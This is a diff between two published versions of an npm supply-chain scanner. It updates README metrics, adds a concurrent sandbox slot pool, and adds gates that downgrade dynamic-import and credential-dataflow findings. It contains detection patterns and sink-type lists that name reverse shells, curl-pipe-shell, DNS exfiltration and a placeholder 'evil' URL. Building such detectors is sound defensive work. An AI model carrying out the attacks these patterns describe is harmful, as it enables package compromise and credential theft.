muaddib-scanner 2.11.117 → 2.11.119

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/README.md CHANGED
@@ -30,7 +30,7 @@
30
30
 
31
31
  npm and PyPI supply-chain attacks are exploding. Shai-Hulud compromised 25K+ repos in 2025. Existing tools detect threats but don't help you respond.
32
32
 
33
- MUAD'DIB combines **20 parallel scanners** (264 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
33
+ MUAD'DIB combines **20 parallel scanners** (266 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
34
34
 
35
35
  ---
36
36
 
@@ -202,9 +202,9 @@ muaddib replay # Ground truth validation (90/94 TPR@3, v2.11
202
202
  | Python Source (PYSRC) | Import-time / install-time RCE patterns in `__init__.py` / `setup.py` (v2.11.41 — closes TrapDoor PyPI gap) |
203
203
  | Python AST (PYAST) | Tree-sitter-Python AST with taint-aware detectors (v2.11.42+) |
204
204
 
205
- ### 264 detection rules
205
+ ### 266 detection rules
206
206
 
207
- All rules (259 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v21176) for the complete rules reference.
207
+ All rules (261 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v211117) for the complete rules reference.
208
208
 
209
209
  ### Detected campaigns
210
210
 
@@ -278,7 +278,7 @@ With pre-commit framework:
278
278
  ```yaml
279
279
  repos:
280
280
  - repo: https://github.com/DNSZLSK/muad-dib
281
- rev: v2.11.76
281
+ rev: v2.11.117
282
282
  hooks:
283
283
  - id: muaddib-scan
284
284
  ```
@@ -303,7 +303,7 @@ These are the numbers a user gets when running `muaddib scan` against npm or PyP
303
303
  | **FPR PyPI** (v2.11.48, first honest measurement) | **9.68%** (12/124 scanned, 132 total) | **Track D fixed the PyPI downloader** — removed `pip --no-binary :all:` flag (forced compile of wheel-only packages, timed out 38% of the time) + added `.whl` extraction via `extractArchive()`. Brought 42 previously-skipped giants (numpy/pandas/django/matplotlib/scikit-learn/...) into scope. All 12 FPs cluster at score 25-35: this is the cap-PyPI-35 artifact, not new rule misfires. Lifting the cap (Track E) would drop FPR PyPI to ≈0%. 8 residual fails are >500MB packages (torch, tensorflow, scipy, opencv-python, ansible…) hitting the 30s `PACK_TIMEOUT_MS`. |
304
304
  | **ADR** (Adversarial + Holdout, v2.11.48) | **96.26%** (103/107) | 67 adversarial + 40 holdout, global threshold=20. Stable vs v2.10.95. |
305
305
 
306
- **4132 tests** across 115 files. **264 rules** (259 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
306
+ **4414 tests** across 141 files. **266 rules** (261 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
307
307
 
308
308
  **Known issues (v2.11.48):**
309
309
  - *Cap PyPI à 35/100*: Python samples plafonnent à `riskScore=35` even when `globalRiskScore=100`. Confirmed empirically — all 12 PyPI FPs at score 25-35 (flask 32, django 35, tornado 35, bottle 30, pandas 25, matplotlib 25, plotly 25, bokeh 25, pymongo 35, coverage 32, fabric 35, websockets 35). Lifting the cap will simultaneously drop FPR PyPI to ≈0% and unblock PyPI MALWARE detection at higher thresholds. Track E target.
@@ -380,7 +380,7 @@ npm test
380
380
 
381
381
  ### Testing
382
382
 
383
- - **4132 tests** across 115 modular test files
383
+ - **4414 tests** across 141 modular test files
384
384
  - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
385
385
  - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
386
386
  - **Ground truth validation** - 96 real-world attacks (95.74% TPR@3, 88.30% TPR@20 — v2.11.48 full measure on 94 in-scope)
@@ -401,7 +401,7 @@ npm test
401
401
  - [Documentation Index](docs/INDEX.md) - All documentation in one place
402
402
  - [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) - Experimental protocol, holdout scores
403
403
  - [Threat Model](docs/threat-model.md) - What MUAD'DIB detects and doesn't detect
404
- - [Security Policy](SECURITY.md) - Detection rules reference (259 rules)
404
+ - [Security Policy](SECURITY.md) - Detection rules reference (261 rules)
405
405
  - [Security Audit](docs/SECURITY_AUDIT.md) - Bypass validation report
406
406
  - [FP Analysis](docs/EVALUATION.md) - Historical false positive analysis
407
407
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "muaddib-scanner",
3
- "version": "2.11.117",
3
+ "version": "2.11.119",
4
4
  "description": "Supply-chain threat detection & response for npm & PyPI/Python",
5
5
  "main": "src/index.js",
6
6
  "bin": {
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "target": "node_modules",
3
- "timestamp": "2026-06-14T18:18:10.262Z",
3
+ "timestamp": "2026-06-16T08:29:32.212Z",
4
4
  "threats": [
5
5
  {
6
6
  "type": "string_mutation_obfuscation",
@@ -406,7 +406,7 @@ async function resolveHostWithRetry(hostname, opts = {}) {
406
406
  dns.promises.resolve4(hostname).catch(() => []),
407
407
  dns.promises.resolve6(hostname).catch(() => [])
408
408
  ]);
409
- } catch (e) { lastErr = e; }
409
+ } catch { /* DNS threw — ipv4/ipv6 stay [], handled by the no-records path below */ }
410
410
  const all = [...ipv4, ...ipv6];
411
411
  if (all.length > 0) return { ipv4, ipv6, all };
412
412
  lastErr = new Error(`Webhook blocked: no DNS records found for ${hostname}`);
@@ -9,7 +9,7 @@ const { setVerboseMode, isSandboxEnabled, isCanaryEnabled, isLlmDetectiveEnabled
9
9
  const { loadState, saveState, loadDailyStats, saveDailyStats, purgeTarballCache, isDailyReportDue, atomicWriteFileSync, saveNpmSeq, ALERTS_FILE, runStateMigrations, loadRecentlyScanned, saveRecentlyScanned } = require('./state.js');
10
10
  const { isTemporalEnabled, isTemporalAstEnabled, isTemporalPublishEnabled, isTemporalMaintainerEnabled } = require('./temporal.js');
11
11
  const { pendingGrouped, flushScopeGroup, sendDailyReport, redeliverPendingReportOnBoot, alertedPackageRules, ALERTED_PACKAGES_MAX: MAX_ALERTED_PACKAGES } = require('./webhook.js');
12
- const { poll, getPollBackoffMs } = require('./ingestion.js');
12
+ const { poll, getPollBackoffMs, SOFT_BACKPRESSURE_THRESHOLD } = require('./ingestion.js');
13
13
  const { ensureWorkers, drainWorkers, getTargetConcurrency, setTargetConcurrency, getActiveWorkers, terminateAllWorkers, getInFlightItems, computeInterruptDisposition } = require('./queue.js');
14
14
  const { computeTarget, ADJUST_INTERVAL_MS, BASE_CONCURRENCY } = require('./adaptive-concurrency.js');
15
15
  const { startHealthcheck } = require('./healthcheck.js');
@@ -42,9 +42,25 @@ const SHUTDOWN_DRAIN_MAX_MS = (() => {
42
42
  return Number.isFinite(v) && v > 0 ? v : 20_000;
43
43
  })();
44
44
 
45
+ // Drain ceiling (marge): re-ingest from the spill backlog as long as the live
46
+ // queue stays a safe margin BELOW the ingestion backpressure point. The old
47
+ // default (500) was unreachable in steady state — the live queue structurally
48
+ // sits in the thousands (μ scan ≈ λ ingest in active hours), so the backlog
49
+ // drained ~never and grew toward its cap (a one-way street). Tying the ceiling
50
+ // to SOFT_BACKPRESSURE_THRESHOLD makes the drain a self-throttling trickle: it
51
+ // fires during any non-congested window (pressure NONE + headroom) and stops as
52
+ // the queue approaches the point where ingestion would pause anyway, so the
53
+ // backlog never starves fresh ingestion. Env-tunable for live ops.
54
+ const SPILL_DRAIN_MARGIN = (() => {
55
+ const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_MARGIN, 10);
56
+ return Number.isFinite(v) && v > 0 ? v : 5_000;
57
+ })();
45
58
  const SPILL_DRAIN_THRESHOLD = (() => {
46
59
  const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_THRESHOLD, 10);
47
- return Number.isFinite(v) && v > 0 ? v : 500;
60
+ if (Number.isFinite(v) && v > 0) return v;
61
+ // Default: a fixed margin below backpressure (30K - 5K = 25K). Clamp to >= 1
62
+ // in case a future backpressure value is smaller than the margin.
63
+ return Math.max(1, SOFT_BACKPRESSURE_THRESHOLD - SPILL_DRAIN_MARGIN);
48
64
  })();
49
65
  const SPILL_DRAIN_BATCH = (() => {
50
66
  const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_BATCH, 10);
@@ -6,11 +6,12 @@
6
6
  * Items are sorted by riskScore DESC (highest-risk first) to defend
7
7
  * against queue-poisoning attacks.
8
8
  *
9
- * The worker owns a dedicated sandbox slot (_deferredSlotBusy) that is
10
- * completely independent from the shared semaphore used by T1a/T1b/T2.
11
- * This guarantees the deferred worker can always process, regardless of
12
- * how many main-path sandboxes are running. The VPS supports N+1
13
- * concurrent gVisor containers (3 main + 1 deferred).
9
+ * The worker owns a dedicated POOL of sandbox slots (DEFERRED_SANDBOX_SLOTS,
10
+ * _deferredSlotsActive) that is completely independent from the shared semaphore
11
+ * used by the synchronous path. This guarantees the deferred worker can always
12
+ * process, regardless of how many main-path sandboxes are running, and runs
13
+ * several items concurrently so the queue actually drains (a single slot
14
+ * serialized all T1a deep sandboxes and the queue stayed permanently full).
14
15
  */
15
16
  const fs = require('fs');
16
17
  const path = require('path');
@@ -32,10 +33,23 @@ const DEFERRED_STATE_FILE = path.join(__dirname, '..', '..', 'data', 'deferred-q
32
33
  // slot. HIGH=10 pts is the intended T1b floor — values below 5 are LOW-only
33
34
  // aggregates which carry no actionable sandbox signal.
34
35
  const DEFERRED_MIN_SCORE = 5;
35
- // Hard ceiling on a single deferred sandbox run so the dedicated slot
36
- // (_deferredSlotBusy) can never wedge. maxRuns=1 self-bounds at ~SINGLE_RUN_TIMEOUT
37
- // (90s) + the sandbox watchdog grace; this AbortController is belt-and-suspenders.
36
+ // Hard ceiling on a single deferred sandbox run so a deferred slot can never
37
+ // wedge. maxRuns=1 self-bounds at ~SINGLE_RUN_TIMEOUT (90s) + the sandbox
38
+ // watchdog grace; this AbortController is belt-and-suspenders.
38
39
  const DEFERRED_SANDBOX_TIMEOUT_MS = 150_000;
40
+ // Number of CONCURRENT deferred sandbox runs. The old design used a single
41
+ // boolean slot (1 at a time), which serialized ALL deferred T1a deep sandboxes
42
+ // — measured at ~1 run / several minutes, so the queue (cap DEFERRED_QUEUE_MAX)
43
+ // sat permanently full with items aging out at TTL. Phase 3 routed T1a's sandbox
44
+ // here AND bypasses the shared semaphore, so the main pool (MUADDIB_SANDBOX_CONCURRENCY)
45
+ // was sitting idle while everything queued behind one deferred slot. This pool
46
+ // uses that idle capacity. Default 3 (conservative under the typical 4-slot main
47
+ // pool); each gVisor container is ~512 MB, so 3 ≈ 1.5 GB — keep an eye on host
48
+ // RSS if raised. Env-tunable for live ops.
49
+ const DEFERRED_SANDBOX_SLOTS = (() => {
50
+ const v = parseInt(process.env.MUADDIB_DEFERRED_SANDBOX_SLOTS, 10);
51
+ return Number.isFinite(v) && v >= 1 ? v : 3;
52
+ })();
39
53
 
40
54
  // Tier priority for the deferred queue. Phase 3 routes T1a's sandbox here (async)
41
55
  // instead of block-waiting a scan worker, so T1a is the highest-confidence tier and
@@ -61,7 +75,10 @@ const _deferredQueue = [];
61
75
  const _deferredSeen = new Set(); // name@version dedup
62
76
  let _workerHandle = null;
63
77
  let _stats = null; // reference to shared stats object
64
- let _deferredSlotBusy = false; // Dedicated slot: true while deferred sandbox is running
78
+ let _deferredSlotsActive = 0; // Concurrent deferred sandbox runs in flight (0..DEFERRED_SANDBOX_SLOTS)
79
+ // Indirection so tests can inject a controllable async sandbox without Docker
80
+ // (the concurrency contract is verified behaviorally, not by source-grep).
81
+ let _runSandboxFn = runSandbox;
65
82
 
66
83
  // ── Queue management ──
67
84
 
@@ -204,8 +221,11 @@ async function processDeferredItem(stats) {
204
221
 
205
222
  if (_deferredQueue.length === 0) return null;
206
223
 
207
- // 2. Dedicated slot check — completely independent from main semaphore
208
- if (_deferredSlotBusy) {
224
+ // 2. Pool slot check — completely independent from main semaphore. The
225
+ // synchronous prefix below (shift + increment) runs before the first await,
226
+ // so processDeferredBatch can launch several of these in a tight loop without
227
+ // over-subscribing: each increment is visible to the next iteration.
228
+ if (_deferredSlotsActive >= DEFERRED_SANDBOX_SLOTS) {
209
229
  if (stats) stats.deferredSkipped = (stats.deferredSkipped || 0) + 1;
210
230
  return null;
211
231
  }
@@ -215,10 +235,10 @@ async function processDeferredItem(stats) {
215
235
  const key = `${item.name}@${item.version}`;
216
236
  _deferredSeen.delete(key);
217
237
 
218
- console.log(`[DEFERRED] PROCESSING: ${key} (tier=${_tierLabel(item.tier)}, score=${item.riskScore}, retries=${item.retries})`);
238
+ console.log(`[DEFERRED] PROCESSING: ${key} (tier=${_tierLabel(item.tier)}, score=${item.riskScore}, retries=${item.retries}, slots=${_deferredSlotsActive + 1}/${DEFERRED_SANDBOX_SLOTS})`);
219
239
 
220
- // 4. Run sandbox on dedicated slot (bypasses shared semaphore)
221
- _deferredSlotBusy = true;
240
+ // 4. Run sandbox on a pool slot (bypasses shared semaphore)
241
+ _deferredSlotsActive++;
222
242
  let sandboxResult;
223
243
  const ac = new AbortController();
224
244
  const deadline = setTimeout(() => ac.abort(), DEFERRED_SANDBOX_TIMEOUT_MS);
@@ -230,7 +250,7 @@ async function processDeferredItem(stats) {
230
250
  // single-run (maxRuns=1, ~90s vs ~270s) for fast deferred-queue drain.
231
251
  const maxRuns = item.tier === '1a' ? undefined : 1;
232
252
  markSandboxed(item.name); // stamp for sandbox-revalidation cadence (matches the synchronous path)
233
- sandboxResult = await runSandbox(item.name, { canary, skipSemaphore: true, maxRuns, signal: ac.signal });
253
+ sandboxResult = await _runSandboxFn(item.name, { canary, skipSemaphore: true, maxRuns, signal: ac.signal });
234
254
  console.log(`[DEFERRED] SANDBOX COMPLETE: ${key} -> score=${sandboxResult.score}, severity=${sandboxResult.severity}`);
235
255
  } catch (err) {
236
256
  console.error(`[DEFERRED] SANDBOX ERROR: ${key} — ${err.message}`);
@@ -247,7 +267,7 @@ async function processDeferredItem(stats) {
247
267
  return null;
248
268
  } finally {
249
269
  clearTimeout(deadline);
250
- _deferredSlotBusy = false;
270
+ _deferredSlotsActive--;
251
271
  }
252
272
 
253
273
  // 5. Follow-up webhook if sandbox found something
@@ -302,6 +322,31 @@ async function processDeferredItem(stats) {
302
322
  return sandboxResult;
303
323
  }
304
324
 
325
+ /**
326
+ * Tick dispatcher: launch deferred items CONCURRENTLY up to the free pool slots.
327
+ * processDeferredItem runs its slot-acquire (shift + increment) synchronously
328
+ * before its first await, so each launch is visible to the next loop iteration —
329
+ * no over-subscription past DEFERRED_SANDBOX_SLOTS. Calls are fire-and-forget:
330
+ * processDeferredItem is fully self-contained (its try/catch/finally swallows
331
+ * sandbox errors and always releases the slot), so a launched run never rejects
332
+ * the dispatcher. Returns the number launched this tick (for tests/observability).
333
+ * @returns {number}
334
+ */
335
+ function processDeferredBatch(stats) {
336
+ let launched = 0;
337
+ // Bound the loop by the free slot count so a transient queue can't spin it.
338
+ while (_deferredSlotsActive < DEFERRED_SANDBOX_SLOTS && _deferredQueue.length > 0) {
339
+ const before = _deferredSlotsActive;
340
+ const p = processDeferredItem(stats);
341
+ // If the slot wasn't acquired (e.g. queue emptied by pruning inside the call),
342
+ // stop — otherwise the guard above could loop without progress.
343
+ if (_deferredSlotsActive === before) break;
344
+ launched++;
345
+ if (p && typeof p.catch === 'function') p.catch(() => { /* self-handled */ });
346
+ }
347
+ return launched;
348
+ }
349
+
305
350
  /**
306
351
  * Build Discord embed for deferred sandbox follow-up.
307
352
  */
@@ -348,10 +393,14 @@ function buildDeferredFollowUpEmbed(name, version, ecosystem, sandboxResult, sta
348
393
  function startDeferredWorker(stats) {
349
394
  _stats = stats;
350
395
  if (_workerHandle) return _workerHandle;
351
- console.log(`[DEFERRED] Worker started (interval=${DEFERRED_WORKER_INTERVAL_MS / 1000}s, max=${DEFERRED_QUEUE_MAX}, ttl=${DEFERRED_TTL_MS / 3600000}h)`);
352
- _workerHandle = setInterval(async () => {
396
+ console.log(`[DEFERRED] Worker started (interval=${DEFERRED_WORKER_INTERVAL_MS / 1000}s, max=${DEFERRED_QUEUE_MAX}, slots=${DEFERRED_SANDBOX_SLOTS}, ttl=${DEFERRED_TTL_MS / 3600000}h)`);
397
+ _workerHandle = setInterval(() => {
353
398
  try {
354
- await processDeferredItem(_stats);
399
+ // Fill free pool slots each tick. The dispatcher launches concurrent runs
400
+ // (fire-and-forget); long-running sandboxes keep their slots across ticks,
401
+ // so steady state is DEFERRED_SANDBOX_SLOTS in flight while the queue drains.
402
+ pruneExpired(_stats);
403
+ processDeferredBatch(_stats);
355
404
  } catch (err) {
356
405
  console.error(`[DEFERRED] Worker tick error: ${err.message}`);
357
406
  }
@@ -465,12 +514,25 @@ function _resetDeferredQueue() {
465
514
  _deferredQueue.length = 0;
466
515
  _deferredSeen.clear();
467
516
  _stats = null;
468
- _deferredSlotBusy = false;
517
+ _deferredSlotsActive = 0;
518
+ _runSandboxFn = runSandbox;
469
519
  stopDeferredWorker();
470
520
  }
471
521
 
522
+ // Test seam: inject a controllable sandbox runner (restored by _resetDeferredQueue).
523
+ function _setRunSandboxForTest(fn) {
524
+ _runSandboxFn = fn || runSandbox;
525
+ }
526
+
527
+ // True while at least one deferred sandbox is in flight. Kept for back-compat
528
+ // (callers/tests that only care "is the deferred path active"); use
529
+ // getDeferredSlotsActive() for the concurrent count.
472
530
  function isDeferredSlotBusy() {
473
- return _deferredSlotBusy;
531
+ return _deferredSlotsActive > 0;
532
+ }
533
+
534
+ function getDeferredSlotsActive() {
535
+ return _deferredSlotsActive;
474
536
  }
475
537
 
476
538
  /**
@@ -492,14 +554,18 @@ module.exports = {
492
554
  startDeferredWorker,
493
555
  stopDeferredWorker,
494
556
  processDeferredItem,
557
+ processDeferredBatch,
495
558
  persistDeferredQueue,
496
559
  restoreDeferredQueue,
497
560
  buildDeferredFollowUpEmbed,
498
561
  pruneExpired,
499
562
  isDeferredSlotBusy,
563
+ getDeferredSlotsActive,
500
564
  clearDeferredQueue,
501
565
  _resetDeferredQueue,
566
+ _setRunSandboxForTest,
502
567
  DEFERRED_QUEUE_MAX,
568
+ DEFERRED_SANDBOX_SLOTS,
503
569
  DEFERRED_TTL_MS,
504
570
  DEFERRED_MAX_RETRIES,
505
571
  DEFERRED_WORKER_INTERVAL_MS,
@@ -1528,6 +1528,7 @@ module.exports = {
1528
1528
  POLL_INTERVAL,
1529
1529
  POLL_MAX_BACKOFF,
1530
1530
  MAX_RESPONSE_BYTES,
1531
+ SOFT_BACKPRESSURE_THRESHOLD,
1531
1532
 
1532
1533
  // Mutable state
1533
1534
  getConsecutivePollErrors,
@@ -182,7 +182,13 @@ function _compactBacklog(file, ledgerFn = null) {
182
182
 
183
183
  /**
184
184
  * Pure drain predicate (exported for tests + the daemon main loop): drain only
185
- * when memory pressure is fully cleared AND the live queue has headroom.
185
+ * when memory pressure is fully cleared AND the live queue is below the drain
186
+ * ceiling. `threshold` is a MARGE ceiling (a margin below the ingestion
187
+ * backpressure point — see daemon.js SPILL_DRAIN_THRESHOLD), NOT a "queue nearly
188
+ * empty" low-water mark: the latter (the old 500/5000) was unreachable in steady
189
+ * state, so the backlog never drained. With the marge ceiling the drain is a
190
+ * self-throttling trickle — it auto-stops the moment pressure rises (≥ ELEVATED)
191
+ * or the queue climbs toward backpressure, so it never starves fresh ingestion.
186
192
  */
187
193
  function shouldDrain(pressureLevel, queueLen, threshold) {
188
194
  return pressureLevel === 0 && queueLen < threshold;
@@ -3,6 +3,55 @@
3
3
  const {
4
4
  SOLANA_PACKAGES
5
5
  } = require('./constants.js');
6
+ const { containsDecodePattern } = require('./helpers.js');
7
+
8
+ // Gate #2 (FPR 2026-06-15 — Étape 0 adjudication): a computed dynamic import() is only
9
+ // remote-code-loading when there is positive evidence of a remote/decoded/env-driven target
10
+ // (URL literal, .replace() URL manipulation, atob/Buffer decode, or a process.env-sourced
11
+ // specifier). Bounded-local imports — CLI subcommand dispatchers (import(MAP[cmd])), layout/i18n
12
+ // loaders (import(`../x/${name}.js`)), dep-resolve / own-dist shims (import(join(dir,'dist/main.js')))
13
+ // — were ~19% of the band-20-49 false positives with 0 TP. Without evidence, computed imports
14
+ // stay HIGH (still fires, but ~25→10 pts: sub-threshold alone) instead of CRITICAL. Flag-gated;
15
+ // when the flag is off the legacy CRITICAL-on-Identifier/TemplateLiteral behavior is preserved.
16
+ function _importStaticText(node) {
17
+ if (!node) return '';
18
+ if (node.type === 'Literal') return typeof node.value === 'string' ? node.value : '';
19
+ if (node.type === 'TemplateLiteral') {
20
+ return (node.quasis || [])
21
+ .map(q => (q.value && (q.value.cooked != null ? q.value.cooked : q.value.raw)) || '')
22
+ .join(' ');
23
+ }
24
+ if (node.type === 'BinaryExpression' && node.operator === '+') {
25
+ return _importStaticText(node.left) + ' ' + _importStaticText(node.right);
26
+ }
27
+ return '';
28
+ }
29
+
30
+ function _isProcessEnvMember(node) {
31
+ return !!node && node.type === 'MemberExpression' &&
32
+ node.object && node.object.type === 'MemberExpression' &&
33
+ node.object.object && node.object.object.type === 'Identifier' && node.object.object.name === 'process' &&
34
+ node.object.property && node.object.property.type === 'Identifier' && node.object.property.name === 'env';
35
+ }
36
+
37
+ function _importRemoteEvidence(src, ctx) {
38
+ // URL manipulation (GlassWorm): import(x.replace(...))
39
+ if (src.type === 'CallExpression' && src.callee && src.callee.type === 'MemberExpression' &&
40
+ src.callee.property && src.callee.property.name === 'replace') return true;
41
+ // env-driven specifier: import(process.env.X), or import(v) where v was assigned from process.env.X
42
+ if (_isProcessEnvMember(src)) return true;
43
+ if (src.type === 'Identifier' && ctx.varSource && ctx.varSource.get(src.name) === 'env_var') return true;
44
+ // identifier resolving to a URL string literal: const u = 'https://evil/x.js'; import(u)
45
+ if (src.type === 'Identifier' && ctx.stringVarValues) {
46
+ const resolved = ctx.stringVarValues.get(src.name);
47
+ if (resolved && /https?:|:\/\//i.test(resolved)) return true;
48
+ }
49
+ // runtime decode: import(atob(...)) / import(Buffer.from(...).toString())
50
+ if (containsDecodePattern(src)) return true;
51
+ // explicit URL scheme in the static parts of the specifier
52
+ if (/https?:|:\/\//i.test(_importStaticText(src))) return true;
53
+ return false;
54
+ }
6
55
 
7
56
  function handleImportExpression(node, ctx) {
8
57
  if (node.source) {
@@ -25,11 +74,29 @@ function handleImportExpression(node, ctx) {
25
74
  if (SOLANA_PACKAGES.some(pkg => src.value === pkg)) {
26
75
  ctx.hasSolanaImport = true;
27
76
  }
77
+ } else if (process.env.MUADDIB_DYNIMPORT_BOUNDED === '1') {
78
+ // Gate #2 (downgrade-only — never escalates above legacy severity, so it cannot raise FPR):
79
+ // a legacy-CRITICAL computed import (Identifier / TemplateLiteral / .replace URL) drops to HIGH
80
+ // when there is NO remote/decode/env evidence (bounded/local: CLI dispatchers, layout/i18n
81
+ // loaders, dep-resolve shims). With evidence it stays CRITICAL; a legacy-HIGH argument stays HIGH.
82
+ const legacyCritical = src.type === 'Identifier' || src.type === 'TemplateLiteral' ||
83
+ (src.type === 'CallExpression' && src.callee?.property?.name === 'replace');
84
+ const bounded = legacyCritical && !_importRemoteEvidence(src, ctx);
85
+ ctx.threats.push({
86
+ type: 'dynamic_import',
87
+ severity: bounded ? 'HIGH' : (legacyCritical ? 'CRITICAL' : 'HIGH'),
88
+ message: bounded
89
+ ? 'Dynamic import() with computed (bounded/local) argument — possible obfuscation.'
90
+ : (legacyCritical
91
+ ? 'Dynamic import() with computed URL argument — remote code loading from dynamically constructed URL.'
92
+ : 'Dynamic import() with computed argument (possible obfuscation).'),
93
+ file: ctx.relFile
94
+ });
28
95
  } else {
29
- // Blue Team v8b (C6): Dynamic import with non-literal arg if it's a variable
30
- // built from URL manipulation, this is remote code loading
31
- const isCritical = node.source.type === 'Identifier' || node.source.type === 'TemplateLiteral' ||
32
- (node.source.type === 'CallExpression' && node.source.callee?.property?.name === 'replace');
96
+ // Legacy behavior (gate off): Blue Team v8b (C6) non-literal arg is CRITICAL when it
97
+ // looks like a constructed URL (Identifier / TemplateLiteral / .replace()).
98
+ const isCritical = src.type === 'Identifier' || src.type === 'TemplateLiteral' ||
99
+ (src.type === 'CallExpression' && src.callee?.property?.name === 'replace');
33
100
  ctx.threats.push({
34
101
  type: 'dynamic_import',
35
102
  severity: isCritical ? 'CRITICAL' : 'HIGH',
@@ -216,6 +216,11 @@ function handlePostWalk(ctx) {
216
216
  });
217
217
  }
218
218
 
219
+ // Per-file network-destination verdict (decoy-safe): true iff every literal host is
220
+ // local/reserved or a curated provider; any public-IP/suspicious/unknown host — or no host —
221
+ // ⇒ false. Reused by the detached/uncaught-exfil compounds below.
222
+ const destAllBenign = ctx._content ? networkDestinationsAllBenign(ctx._content) : false;
223
+
219
224
  // Credential regex harvesting: credential-matching regex + network call in same file
220
225
  // Real-world pattern: Transform/stream that scans data for tokens/passwords and exfiltrates
221
226
  if (ctx.hasCredentialRegex && ctx.hasNetworkCallInFile) {
@@ -328,7 +333,7 @@ function handlePostWalk(ctx) {
328
333
  // destination in the file is first-party/local/provider (e.g. an otel collector on
329
334
  // localhost, an SDK POST to its own API). A suspicious/unknown/public-IP host — or no
330
335
  // literal host at all — leaves it firing (conservative: confirmed-benign only).
331
- const destAllBenign = ctx._content ? networkDestinationsAllBenign(ctx._content) : false;
336
+ // (destAllBenign is computed once above, at the credential_regex_harvest emission site.)
332
337
  if (hasDetachedInFile && hasSensitiveEnvInFile && ctx.hasNetworkCallInFile && !destAllBenign) {
333
338
  ctx.threats.push({
334
339
  type: 'detached_credential_exfil',
@@ -1043,6 +1043,40 @@ function analyzeFile(content, filePath, basePath) {
1043
1043
  }
1044
1044
  }
1045
1045
 
1046
+ // Gate #1 (FPR 2026-06-15 — Étape 0 adjudication): the C7 block above only covers pure
1047
+ // env_read sources; the dominant live FP cluster (~25% of band 20-49, 0 TP) is a
1048
+ // credential_env_read API key (OPENAI_API_KEY, YINGDAO_ACCESS_TOKEN, …) flowing to the
1049
+ // package's OWN first-party API or a curated provider. The decoy-safe discriminant is
1050
+ // brand coherence (env-var brand ↔ host label) + curated providers + local hosts, applied
1051
+ // to EVERY destination. Limited to env-like sources (a credential_read FILE, command_output,
1052
+ // or fingerprint_read source stays CRITICAL — those are genuinely higher-risk). Downgrade to
1053
+ // MEDIUM so the signal survives; residual = compromised first-party domain, the same risk the
1054
+ // mature/MT-1 cap already accepts. Flag-gated (default off) for measure-then-flip rollout.
1055
+ if (process.env.MUADDIB_DF_SDK_GATE === '1' &&
1056
+ (severity === 'CRITICAL' || severity === 'HIGH')) {
1057
+ const envLike = sources.filter(s => s.type === 'env_read' || s.type === 'credential_env_read');
1058
+ const onlyEnvLike = sources.every(s =>
1059
+ s.type === 'env_read' || s.type === 'credential_env_read' || s.type === 'telemetry_read');
1060
+ if (envLike.length > 0 && onlyEnvLike) {
1061
+ try {
1062
+ const { extractBrandFromEnvVar, networkDestinationsAllBenignOrBrand } = require('../sdk-destination.js');
1063
+ const gateContent = fs.readFileSync(filePath, 'utf8');
1064
+ const brands = envLike.map(s => {
1065
+ const envVar = s.name
1066
+ .replace(/^process\.env\./, '')
1067
+ .replace(/^process\.env\[['"]/, '')
1068
+ .replace(/['"]\]$/, '');
1069
+ return extractBrandFromEnvVar(envVar);
1070
+ }).filter(Boolean);
1071
+ if (networkDestinationsAllBenignOrBrand(gateContent, brands)) {
1072
+ severity = 'MEDIUM';
1073
+ }
1074
+ } catch {
1075
+ // sdk-destination / file read unavailable — keep severity
1076
+ }
1077
+ }
1078
+ }
1079
+
1046
1080
  const sourceDesc = hasCommandOutput ? 'command output' : 'credentials read';
1047
1081
  threats.push({
1048
1082
  type: 'suspicious_dataflow',
@@ -978,7 +978,7 @@ function isNetworkSinkDescriptor(sink) {
978
978
  * file references a suspicious/paste host, a public IP, or any unknown domain (so a real
979
979
  * exfil like ecto — webhook.site + direct-IP — keeps firing). The package stays visible
980
980
  * via its other (lower-severity) signals, the same way intent-graph skips SDK pairs.
981
- * Rationale + corpus: FPR-segment-A-diagnosis-2026-06-14.md.
981
+ * Rationale + corpus: chantier FPR segment A (2026-06).
982
982
  *
983
983
  * @param {Array} flows - assembled cross-file flows (main + callback + emitter)
984
984
  * @param {string} packagePath - package root, to resolve sink file content
package/src/scoring.js CHANGED
@@ -1051,6 +1051,25 @@ function _hasExfilSink(threats) {
1051
1051
  return threats.some(t => EXFIL_SINK_TYPES.has(t.type) && t.severity !== 'LOW');
1052
1052
  }
1053
1053
 
1054
+ // Sink-coupling (chantier 2026-06-15): the subset of EXFIL_SINK_TYPES that PROVES taint or
1055
+ // unambiguous structural malice — NOT mere host-reputation string presence. When one of these
1056
+ // co-occurs with credential_regex_harvest it stays HIGH (anti-FN floor: protects cross-file
1057
+ // read→exfil and the intent/detached/staged compounds). The complement (suspicious_domain,
1058
+ // direct_ip_exfil, ioc_string_match, ioc_match) is host-reputation-only.
1059
+ const PROVEN_EXFIL_SINK_TYPES = new Set([
1060
+ 'known_malicious_package', 'pypi_malicious_package', 'shai_hulud_marker',
1061
+ 'detached_credential_exfil', 'silent_stealth_process',
1062
+ 'curl_pipe_shell', 'curl_env_exfil', 'reverse_shell', 'dns_exfil', 'oast_callback',
1063
